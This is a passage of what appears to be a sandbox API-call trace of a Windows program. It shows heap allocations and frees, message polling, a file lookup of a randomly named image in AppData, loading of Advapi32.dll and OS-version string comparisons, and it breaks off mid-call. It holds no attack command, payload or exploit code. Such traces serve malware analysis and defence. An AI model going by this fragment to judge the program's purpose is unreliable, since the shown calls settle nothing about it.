dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0121.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0121.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0121.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0121.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0121.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0121.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0121.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0121.912] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0121.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0121.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0121.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0121.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0121.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0121.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0121.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0121.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0121.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0121.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0121.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0121.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0121.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0121.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0121.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0121.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0121.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0121.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0121.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0121.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0121.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0121.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0121.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0121.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0121.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0121.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0121.915] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0121.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0121.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0121.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0121.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0121.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.916] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0121.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0121.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0121.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0121.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0121.916] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.916] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DjTk 0Dq17Pz4t2AMa.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c861d80, ftCreationTime.dwHighDateTime=0x1d5cf37, ftLastAccessTime.dwLowDateTime=0x3c29f900, ftLastAccessTime.dwHighDateTime=0x1d5d602, ftLastWriteTime.dwLowDateTime=0x3c29f900, ftLastWriteTime.dwHighDateTime=0x1d5d602, nFileSizeHigh=0x0, nFileSizeLow=0x14d04, dwReserved0=0x0, dwReserved1=0x0, cFileName="DjTk 0Dq17Pz4t2AMa.png", cAlternateFileName="DJTK0D~1.PNG")) returned 0x9a4900 [0121.916] FindClose (in: hFindFile=0x9a4900 | out: hFindFile=0x9a4900) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0121.917] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0121.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0121.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0121.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0121.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0121.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0121.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722a8 [0121.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0121.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0121.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0121.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.918] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.918] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0121.918] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0121.918] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0121.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0121.919] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0121.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0121.920] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0121.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0121.920] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0121.920] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0121.920] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0121.920] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0121.920] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0121.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0121.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 